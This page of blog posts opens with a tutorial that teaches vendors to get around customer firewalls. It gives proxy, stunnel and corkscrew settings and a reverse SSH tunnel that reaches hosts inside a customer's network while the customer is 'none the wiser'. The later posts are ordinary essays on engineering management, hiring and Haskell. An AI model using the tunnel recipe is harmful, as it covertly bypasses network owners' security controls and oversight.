Thursday, August 29, 2024

Firewall rules: not as secure as you think

Firewall rules: not as secure as you think

This post introduces some tricks for jailbreaking hosts behind “secure” enterprise firewalls in order to enable arbitrary inbound and outbound requests over any protocol. You’ll probably find the tricks outlined in the post useful if you need to deploy software in a hostile networking environment.

The motivation for these tricks is that you might be a vendor that sells software that runs in a customer’s datacenter (a.k.a. on-premises software), so your software has to run inside of a restricted network environment. You (the vendor) can ask the customer to open their firewall for your software to communicate with the outside world (e.g. your own datacenter or third party services), but customers will usually be reluctant to open their firewall more than necessary.

For example, you might want to ssh into your host so that you can service, maintain, or upgrade the host, but if you ask the customer to open their firewall to let you ssh in they’ll usually push back on or outright reject the request. Moreover, this isn’t one of those situations where you can just ask for forgiveness instead of permission because you can’t begin to do anything without explicitly requesting some sort of firewall change on their part.

So I’m about to teach you a bunch of tricks for efficiently tunneling whatever you want over seemingly innocuous openings in a customer’s firewall. These tricks will culminate with the most cursed trick of all, which is tunneling inbound SSH connections inside of outbound HTTPS requests. This will grant you full command-line access to your on-premises hosts using the most benign firewall permission that a customer can grant. Moreover, this post is accompanied by a repository named holepunch containing NixOS modules automating this ultimate trick which you can either use directly or consult as a working proof-of-concept for how the trick works.

Overview

Most of the tricks outlined in this post assume that you control the hosts on both ends of the network request. In other words, we’re going to assume that there is some external host in your datacenter and some internal host in the customer’s datacenter and you control the software running on both hosts.

There are four tricks in our arsenal that we’re going to use to jailbreak internal hosts behind a restrictive customer firewall:

Once you master these four tools you will typically be able to do basically anything you want using the slimmest of firewall permissions.

You might also want to read another post of mine: Forward and reverse proxies explained. It’s not required reading for this post, but you might find it helpful or interesting if you like this post.

Proxies

We’re going to start with proxies since that’s the easiest thing to explain which requires no other conceptual dependencies.

A proxy is a host that can connect to other hosts on a client’s behalf (instead of the client making a direct connection to those other hosts). We will call these other hosts “upstream hosts”.

One of the most common tricks when jailbreaking an internal host (in the customer’s datacenter) is to create an external host (in your datacenter) that is a proxy. This is really effective because the customer has no control over traffic between the proxy and upstream hosts. The customer’s firewall can only see, manage, and intercept traffic between the internal host and the proxy, but everything else is invisible to them.

There are two types of proxies, though: forward proxies and reverse proxies. Both types of proxies are going to come in handy for jailbreaking our internal host.

Forward proxy

A forward proxy is a proxy that lets the client decide which upstream host to connect to. In our case, the “client” is the internal host that resides in the customer datacenter that is trying to bypass the firewall.

Forward proxies come in handy when the customer restricts which hosts that you’re allowed to connect to. For example, suppose that your external host’s address is external.example.com and your internal hosts’s address is internal.example.com. Your customer might have a firewall rule that prevents internal.example.com from connecting to any host other than external.example.com. The intention here is to prevent your machine from connecting to other (potentially malicious) machines. However, this firewall rule is quite easy for a vendor to subvert.

All you have to do is host a forward proxy at external.example.com and then any time internal.example.com wants to connect to any other domain (e.g. google.com) it can just route the request through the forward proxy hosted at external.example.com. For example, squid is one example of a forward proxy that you can use for this purpose, and you could configure it like this:

acl internal src ${SUBNET OF YOUR INTERNAL SERVER(S)}

http_access allow internal
http_access deny all

… and then squid will let any program on internal.example.com connect to any host reachable from external.example.com so long as the program configured http://external.example.com:3128 as the forward proxy. For example, you’d be able to run this command on internal.example.com:

$ curl --proxy http://external.example.com:3128 https://google.com

… and the request would succeed despite the firewall because from the customer’s point of view they can’t tell that you’re using a forward proxy. Or can they?

Reverse proxy

Well, actually the customer can tell that you’re doing something suspicious. The connection to squid isn’t encrypted (note that the scheme for our forward proxy URI is http and not https), and most modern firewalls will be smart enough to monitor unencrypted traffic and notice that you’re trying to evade the firewall by using a forward proxy (and they will typically block your connection if you try this). Oops!

Fortunately, there’s a very easy way to evade this: encrypt the traffic to the proxy! There are quite a few ways to do this, but the most common approach is to put a “TLS-terminating reverse proxy” in front of any service that needs to be encrypted.

So what’s a “reverse proxy”? A reverse proxy is a proxy where the proxy decides which upstream host to connect to (instead of the client deciding). A TLS-terminating reverse proxy is one whose sole purpose is to provide an encrypted endpoint that clients can connect to and then it forwards unencrypted traffic to some (fixed) upstream endpoint (e.g. squid running on external.example.com:3128 in this example).

There are quite a few services created for doing this sort of thing, but the three I’ve personally used the most throughout my career are:

  • nginx
  • haproxy
  • stunnel

For this particular case, I actually will be using stunnel to keep things as simple as possible (nginx and haproxy require a bit more configuration to get working for this).

You would run stunnel on external.example.com with a configuration that would look something like this:

[default]
accept = 443
connect = localhost:3128
cert = /path/to/your-certificate.pem

… and now connections to https://external.example.com are encrypted and handled by stunnel, which will decrypt the traffic and route those requests to squid running on port 3128 of the same machine.

In order for this to work you’re going to need a valid certificate for external.example.com, which you can obtain for free using Let’s Encrypt. Then you staple the certificate public key and private key to generate the final PEM file that you reference in the above stunnel configuration.

So if you’ve gotten this far your server can now access any publicly reachable address despite the customer’s firewall restriction. Moreover, the customer can no longer detect that anything is amiss because all of your connections to the outside world will appear to the customer’s firewall as encrypted HTTPS connections to external.example.com:443, which is an extremely innocuous type of of connection.

Reverse tunnel

We’re only getting started, though! By this point we can make whatever outbound connections we want, but WHAT ABOUT INBOUND CONNECTIONS?

As it turns out, there is a trick known as a reverse tunnel which lets you tunnel inbound connections over outbound connections. Most reverse tunnels exploit two properties of TCP connections:

  • TCP connections may be long-lived (sometimes very long-lived)
  • TCP connections must necessarily support network traffic in both directions

Now, in the common case a lot of TCP connections are short-lived. For example, when you open https://google.com in your browser that is an HTTPS request which is layered on top of a TCP connection. The HTTP request message is data sent in one direction over the TCP connection and the HTTP response message is data sent in the other direction over the TCP connection and then the TCP connection is closed.

But TCP is much more powerful than that and reverse tunnels exploit that latent protocol power. To illustrate how that works I’ll use the most widely known type of reverse tunnel: the SSH reverse tunnel.

You typically create an SSH reverse tunnel by running a command like this from the internal machine (e.g. internal.example.com):

$ ssh -R "${EXTERNAL_PORT}:localhost:${INTERNAL_PORT}" -N external.example.com

In an SSH reverse tunnel, the internal machine (e.g. internal.example.com) initiates an outbound TCP request to the SSH daemon (sshd) listening on the external machine (e.g. external.example.com). When sshd receives this TCP request it keeps the TCP connection alive and then listens for inbound requests on EXTERNAL_PORT of the external machine. sshd forward all requests received on that port through the still-alive TCP connection back to the INTERNAL_PORT on the internal machine. This works fine because TCP connections permit arbitrary data flow both ways and the protocol does not care if the usual request/response flow is suddenly reversed.

In fact, an SSH reverse tunnel doesn’t just let you make inbound connections to the internal machine; it lets you make inbound connections to any machine reachable from the internal machine (e.g. other machines inside the customer’s datacenter). However, those kinds of connections to other internal hosts can be noticed and blocked by the customer’s firewall.

From the point of view of the customer’s firewall, our internal machine has just made a single long-lived outbound connection to external.example.com and they cannot easily tell that the real requests are coming in the other direction (inbound) because those requests are being tunneled inside of the outbound request.

However, this is not foolproof, for two reasons:

  • A customer’s firewall can notice (and ban) a long-lived connection

    I believe it is possible to disguise a long-lived connection as a series of shorter-lived connections, but I’ve never personally done that before so I’m not equipped to explain how to do that.

  • A customer’s firewall will notice that you’re making an SSH connection of some sort

    Even when the SSH connection is encrypted it is still possible for a firewall to detect that the SSH protocol is being used. A lot of firewalls will be configured to ban SSH traffic by default unless explicitly approved.

However, there is a great solution to that latter problem, which is …

corkscrew

corkscrew is an extremely simple tool that wraps an SSH connection in an HTTP connection. This lets us disguise SSH traffic as HTTP traffic (which we can then further disguise as HTTPS traffic by encrypting the connection using stunnel).

Normally, the only thing we’d need to do is to extend our ssh -R command to add this option:

ssh -R -o 'ProxyCommand /path/to/corkscrew external.example.com 443 %h %p` …

… but this doesn’t work because corkscrew doesn’t support HTTPS connections (it’s an extremely simple program written in just a couple hundred lines of C code). So in order to work around that we’re going to use stunnel again, but this time we’re going to run stunnel in “client mode” on internal.example.com so that it can handle the HTTPS logic on behalf of corkscrew.

[default]
client = yes
accept = 3128
connect = external.example.com:443

… and then the correct ssh command is:

$ ssh -R -o 'ProxyCommand /path/to/corkscrew localhost 3128 %h %p` …

… and now you are able to disguise an outbound SSH request as an outbound HTTPS request.

MOREOVER, you can use that disguised outbound SSH request to create an SSH reverse tunnel which you can use to forward inbound traffic from external.example.com to any INTERNAL_PORT on internal.example.com. Can you guess what INTERNAL_PORT we’re going to pick?

That’s right, we’re going to forward inbound traffic to port 22: sshd. Also, we’re going to arbitrarily set EXTERNAL_PORT to 17705:

$ ssh -R 17705:localhost:22 -N external.example.com

Now, (separately from the above command) we can ssh into our internal server via our external server like this:

$ ssh -p 17705 external.example.com

… and we have complete command-line access to our internal server and the customer is none the wiser.

From the customer’s perspective, we just ask them for an innocent-seeming firewall rule permitting outbound HTTPS traffic from internal.example.com to external.example.com. That is the most innocuous firewall change we can possibly request (short of not opening the firewall at all).

Conclusion

I don’t think all firewall rules are ineffective or bad, but if the same person or organization controls both ends of a connection then typically anything short of completely disabling internet access can be jailbroken in some way with off-the-shelf open source tools. It does require some work, but as you can see with the associated holepunch repository even moderately sophisticated firewall escape hatches can be neatly packaged for others to reuse.

Tuesday, July 23, 2024

Software engineers are not (and should not be) technicians

Software engineers are not (and should not be) technicians

I don’t actually think predictability is a good thing in software engineering. This will probably come as a surprise to some people (especially managers), but I’ll explain what I mean.

In my view, a great software engineer is one who automates repetitive/manual labor. You would think that this is a pretty low bar to clear, right? Isn’t automation of repetitive tasks … like … programming 101? Wouldn’t most software engineers be great engineers according to my criterion?

No.

I would argue that most large software engineering organizations incentivize anti-automation and it’s primarily because of their penchant for predictability, especially predictable estimates and predictable work. The reason this happens is that predictable work is work that could have been automated but was not automated.

Example

I’ll give a concrete example of predictable work from my last job. Early on we had a dedicated developer for maintaining our web API. Every time some other team added a new gRPC API endpoint to an internal service this developer was tasked with exposing that same information via an HTTP API. This was a fairly routine job but it still required time and thought on their part.

Initially managers liked the fact that this developer could estimate reliably (because the work was well-understood) and this developer liked the fact that they didn’t have to leave their comfort zone. But it wasn’t great for the business! This person frequently became a bottleneck for releasing new features because they had inserted their own manual labor as a necessary step in the development pipeline. They made the case that management should hire more such developers like themselves to handle increased demand for their work.

Our team pushed back on this because we recognized that this developer’s work was so predictable that it could be completely automated. We made the case to management that rather than hiring another person to do the same work we should be automating more and it’s a good thing we did; that developer soon left the company and instead of hiring to replace them we automated away their job instead. We wrote some code to automatically generate an HTTP API from the corresponding gRPC API1 and that generated much more value for the business than hiring a new developer.

Technicians vs Engineers

I like to use the term “technician” to describe a developer who (A) does work that is well-understood and (B) doesn’t need to leave their comfort zone very often. Obviously there is not a bright line dividing engineers from technicians, but generally speaking the more predictable and routine a developer’s job the more they tend to slide into becoming a technician. In the above example, I viewed the developer maintaining the web API as more of a technician than an engineer.

In contrast, the more someone leans into being an engineer the more unpredictable their work gets (along with their estimates). If you’re consistently automating things then all of the predictable work slowly dries up and all that’s left is unpredictable work. The nature of a software engineer’s job is that they are tackling increasingly challenging and ambitious tasks as they progressively automate more.

I believe that most tech companies should not bias towards predictability and should avoid hiring/cultivating technicians. The reason that tech companies command outsized valuations is because of automation. Leaning into predictability and well-understood work inadvertently incentivizes manual labor instead of automation. This isn’t obvious to a lot of tech companies because they assume any work involving code is necessarily automation but that’s not always the case2. Tech companies that fail to recognize this end up over-hiring and wondering why less work is getting done with more people.

Or to put it another way: I actually view it as a red flag if an engineer or team gets into a predictable “flow” because it means that there is a promising opportunity for automation they’re ignoring.


  1. Nowadays there are off-the-shelf tools to do this like grpc-gateway but this wasn’t available to us at the time.↩︎

  2. … or even usually the case; I’m personally very cynical about the engineering effectiveness of most tech companies.↩︎

Wednesday, July 3, 2024

Quality and productivity are not necessarily mutually exclusive

Quality and productivity are not necessarily mutually exclusive

One of my pet peeves is when people pit quality and productivity against each other in engineering management discussions because I don’t always view them as competing priorities.

And I don’t just mean that quality improves productivity in the long run by avoiding tech debt. I’m actually saying that a focus on quality can immediately boost delivery speed for the task at hand.

In my experience there are two primary ways that attention to quality helps engineers ship and deliver more features on shorter timescales:

  • Mindfulness of quality counteracts tunnel vision

    By “tunnel vision” I mean the tendency of engineers to focus too much on their initial approach to solving a problem, to the point where they miss other (drastically) simpler solutions to the same problem. When an engineer periodically steps back and holistically evaluates the quality of what they’re building they’re more likely to notice a simpler solution to the same problem.

  • Prioritizing quality improves morale

    Many engineers deeply desire being masters at their craft, and the morale boost of doing a quality job can sharply increase their productivity, too. Conversely, if you pressure an engineer to cut corners and ship at all costs you might decrease the scope of the project but you also might tank their productivity even more and wipe out any gains from cutting scope.

HOWEVER, (and this is a big caveat) the above points do not always apply, which is why I say that a focus on quality only sometimes improves productivity. In other words, part of the art/intuition of being a manager is recognizing the situations where quality supports productivity.

For example, not every engineer cares about doing a quality job or honing their craft (for some people it’s just a job) and if you ask these kinds of engineers to prioritize quality they’re not going to get the morale/productivity boost that a more passionate engineer might get. Like, it could still be the right decision to prioritize quality, but now it’s no longer an obvious decision.

Similarly, not every engineer will benefit from stepping back and thinking longer about the problem at hand because some engineers are enamored with complexity and aren't as good at identifying radically simpler solutions (although I will say that valuing simplicity is a great thing to cultivate in all of your engineers even if they’re not good at it initially). As a manager you have to recognize which engineers will move faster when given this extra breathing room and which ones won’t.

Anyway, the reason I’m writing this post is to counteract the mindset that quality and productivity are competing priorities because this mentality causes people to turn off their brains and miss the numerous opportunities where quality actually supports productivity (even in the very short term).

Tuesday, June 25, 2024

My spiciest take on tech hiring

My spiciest take on tech hiring

… is that you only need to administer one technical interview and one non-technical interview (each no more than an hour long).

In my opinion, any interview process longer than that is not only unnecessary but counterproductive.

Obviously, this streamlined interview process is easier and less time-consuming to administer, but there are other benefits that might not be obvious.

More effective interviews

“When everyone is responsible, no one is responsible.”

Interviewers are much more careful to ask the right questions when they understand that nobody else will be administering a similar interview. They have to make their questions count because they can’t fall back on someone else to fill the gap if they fail to gather enough information to make a decision on the candidate.

Adding more technical or non-technical interviews makes you less likely to gather the information you need because nobody bears ultimate responsibility for gathering decisive information.

Better senior applicants

When hiring for very senior roles the best applicants have a lower tolerance for long and drawn-out interview processes. A heavyweight interview process is a turnoff for the most sought-after candidates (that can be more selective about where they apply).

A lot of companies think that dragging out the interview process helps improve candidate quality, but what they’re actually doing is inadvertently selecting for more desperate candidates that have a higher tolerance for bullshit and process. Is that the kind of engineer that you want to attract as you grow your organization?

Priors and bias

In my experience, people tend to make up their minds on candidates fairly early on in the interview process (or even before the interview process begins). The shorter interview process formalizes the existence of that informal phenomenon.

Especially at larger tech companies, the hiring manager already has a strong prior on a few applicants (either the applicant is someone they or a team member referred or has a strong portfolio) and they have a strong bias to hire those applicants they already knew about before the interviewing process began. Drawing out the interview process is a thinly veiled attempt to launder this bias with a “neutral” process that they will likely disregard/overrule if it contradicts their personal preference.

That doesn’t mean that I think this sort of interviewing bias is good or acceptable, but I also don’t think drawing out the interviewing process corrects for this bias either. If anything, extending the interview process makes it more biased because you are selecting for candidates that can take significant time off from their normal schedule to participate in an extended interview panel (which are typically candidates from privileged backgrounds).

Background

The inspiration for this take is my experience as a hiring manager at my former job. We started out with a longer interview process for full-time applicants and a much shorter interview process for interns (one technical interview and one non-technical interview). The original rationale behind this was that interns were considered lower stakes “hires” so the interview process for them didn’t need to be as “rigorous”.

However, we found that the interview process for interns was actually selecting for exceptional candidates despite what seemed to be “lower standards”, so we thought: why not try this out for all hires and not just interns?

We didn’t make the transition all at once. We gradually eased into it by slowly shaving off one interview from our interview panel with each new opening until we got it down to one technical and one non-technical interview (just like for interns). In the process of doing so we realized with each simplification that we didn’t actually need these extra interviews after all.

Monday, May 20, 2024

Prefer do notation over Applicative operators when assembling records

Prefer do notation over Applicative operators when assembling records

This is a short post explaining why you should prefer do notation when assembling a record, instead of using Applicative operators (i.e. (<$>)/(<*>)). This advice applies both for type constructors that implement Monad (e.g. IO) and also for type constructors that implement Applicative but not Monad (e.g. the Parser type constructor from the optparse-applicative package). The only difference is that in the latter case you would need to enable the ApplicativeDo language extension.

The guidance is pretty simple. Instead of doing this:

data Person = Person
    { firstName :: String
    , lastName :: String
    }

getPerson :: IO Person
getPerson = Person <$> getLine <*> getLine

… you should do this:

{-# LANGUAGE RecordWildCards #-}

{-# OPTIONS_GHC -Werror=missing-fields #-}

data Person = Person
    { firstName :: String
    , lastName :: String
    }

getPerson :: IO Person
getPerson = do
    firstName <- getLine
    lastName <- getLine
    return Person{..}

Why is the latter version better? There are a few reasons.

Ergonomics

It’s more ergonomic to assemble a record using do notation because you’re less pressured to try to cram all the logic into a single expression.

For example, suppose we wanted to explicitly prompt the user to enter their first and last name. The typical way people would do extend the former example using Applicative operators would be something like this:

getPerson :: IO Person
getPerson =
        Person
    <$> (putStrLn "Enter your first name:" *> getLine)
    <*> (putStrLn "Enter your last name:"  *> getLine)

The expression gets so large that you end up having to split it over multiple lines, but if we’re already splitting it over multiple lines then why not use do notation?

getPerson :: IO Person
getPerson = do
    putStrLn "Enter your first name:"
    firstName <- getLine

    putStrLn "Enter your last name:"
    lastName <- getLine

    return Person{..}

Wow, much clearer! Also, the version using do notation doesn’t require that the reader is familiar with all of the Applicative operators, so it’s more approachable to Haskell beginners.

Order insensitivity

Suppose we take that last example and then change the Person type to reorder the two fields:

data Person = Person
    { lastName :: String
    , firstName :: String
    }

… then the former version using Applicative operators would silently break: the first name and last name would now be read in the wrong order. The latter version (using do notation) is unaffected.

More generally, the approach using do notation never breaks or changes its behavior if you reorder the fields in the datatype definition. It’s completely order-insensitive.

Better error messages

If you add a new argument to the Person constructor, like this:

data Person = Person
    { alive :: Bool
    , firstName :: String
    , lastName :: String
    }

… and you don’t make any other changes to the code then the former version will produce two error messages, neither of which is great:

Example.hs:
    • Couldn't match type ‘String -> Person’ with ‘Person’
      Expected: Bool -> String -> Person
        Actual: Bool -> String -> String -> Person
    • Probable cause: ‘Person’ is applied to too few arguments
      In the first argument of ‘(<$>)’, namely ‘Person’
      In the first argument of ‘(<*>)’, namely ‘Person <$> getLine’
      In the expression: Person <$> getLine <*> getLine
  |
  | getPerson = Person <$> getLine <*> getLine
  |             ^^^^^^

Example.hs:
    • Couldn't match type ‘[Char]’ with ‘Bool’
      Expected: IO Bool
        Actual: IO String
    • In the second argument of ‘(<$>)’, namely ‘getLine’
      In the first argument of ‘(<*>)’, namely ‘Person <$> getLine’
      In the expression: Person <$> getLine <*> getLine
  |
  | getPerson = Person <$> getLine <*> getLine
  |                        ^^^^^^^

… whereas the latter version produces a much more direct error message:

Example.hs:…
    • Fields of ‘Person’ not initialised:
        alive :: Bool
    • In the first argument of ‘return’, namely ‘Person {..}’
      In a stmt of a 'do' block: return Person {..}
      In the expression:
        do putStrLn "Enter your first name: "
           firstName <- getLine
           putStrLn "Enter your last name: "
           lastName <- getLine
           ....
   |
   |     return Person{..}
   |            ^^^^^^^^^^
 ^^^^^^^^^^

… and that error message more clearly suggests to the developer what needs to be fixed: the alive field needs to be initialized. The developer doesn’t have to understand or reason about curried function types to fix things.

Caveats

This advice obviously only applies for datatypes that are defined using record syntax. The approach I’m advocating here doesn’t work at all for datatypes with positional arguments (or arbitrary functions).

However, this advice does still apply for type constructors that are Applicatives and not Monads; you just need to enable the ApplicativeDo language extension. For example, this means that you can use this same trick for defining command-line Parsers from the optparse-applicative package:

{-# LANGUAGE ApplicativeDo #-}
{-# LANGUAGE RecordWildCards #-}

{-# OPTIONS_GHC -Werror=missing-fields #-}

import Options.Applicative (Parser, ParserInfo)

import qualified Options.Applicative as Options

data Person = Person
    { firstName :: String
    , lastName :: String
    } deriving (Show)

parsePerson :: Parser Person
parsePerson = do
    firstName <- Options.strOption
        (   Options.long "first-name"
        <>  Options.help "Your first name"
        <>  Options.metavar "NAME"
        )

    lastName <- Options.strOption
        (   Options.long "last-name"
        <>  Options.help "Your last name"
        <>  Options.metavar "NAME"
        )

    return Person{..}

parserInfo :: ParserInfo Person
parserInfo =
    Options.info parsePerson
        (Options.progDesc "Parse and display a person's first and last name")

main :: IO ()
main = do
    person <- Options.execParser parserInfo

    print person

Wednesday, May 8, 2024

All error messages are necessarily bad to some degree

All error messages are necessarily bad to some degree

This is something I feel like enough people don’t appreciate. One of the ways I like to explain this is by this old tweet of mine:

The evolution of an error message:

  • No error message
  • A one-line message
  • “Expected: … / Actual: …”
  • “Here’s what went wrong: …”
  • “Here’s what you should do: …”
  • I automated away what you should do
  • The invalid state is no longer representable

One of the common gripes I will hear about error messages is that they don’t tell the user what to do, but if you stop to think about it: if the error message knew exactly what you were supposed to do instead then your tool could just fix it for you (by automatically doing the right thing instead).

But wait!”, you might say, “sometimes an error message can’t automatically fix the problem for you because there’s not necessarily a right or obvious way to fix the problem or the user’s intent is not clear.” Yes, exactly, which brings us back to the original point:

Error messages are necessarily bad because they cannot anticipate what you should have done instead. If an error message could read your mind then they’d eventually evolve into something better than an error message. This creates a selection bias where the only remaining error messages are the ones that can’t read your mind.

Thursday, February 29, 2024

The siren song of domain-specific languages

The siren song of domain-specific languages

I’ve seen a lot of engineering teams mistakenly believe that they can author domain-specific languages for less technical users on a budget. In particular they seem to believe that if they create this domain-specific language then the less technical users will be able to thoughtlessly churn out a bunch of code in that language and there won’t be any problem and they can then move onto the next project. This rarely works out in the way that people hope it will.

In the best case scenario, your less technical users will churn out a large amount of code using your domain-specific language (which is exactly the outcome you hoped for!) and that corpus of code will push the boundaries of what your language is capable of (like performance, compilation speed, features, or supporting integrations). The larger your userbase the greater the demand will be to improve your language in a myriad of ways.

In the worst case scenario your users will find increasingly inane ways to do things wrong with your language despite your best efforts and you will be expected to clean up their mess because you sold the project on the premise of “our users are not going to have to think”.

… and in either case this process will never end; the project will never be in a “done state” and require permanent staffing. Hell, even if you staff an entire team to support this language it’s still often a struggle to keep up with the needs of less technical users.

This tradeoff can still tempt businesses because it’s appealing to replace skilled labor with unskilled labor. The reasoning goes that a small investment of more skilled labor (the authors of the domain-specific language) can enable a larger pool of less skilled labor (the less technical users) to do most of the work. However, what you will often find in practice is that this larger group of less technical users is frequently blocked without continuous assistance from the engineers who created the language.

So in practice you’re not actually replacing skilled labor with unskilled labor. Rather, you’re merely “laundering” skilled labor as unskilled labor and creating more work for your engineers to make them seem more replaceable than they actually are.

I do think there are situations where domain-specific languages make sense, but typically not on the scale of a software engineering organization or even a small product. I personally think this sort of division of labor tends to only work on the scale of an open source ecosystem where you get a large enough economy of scale.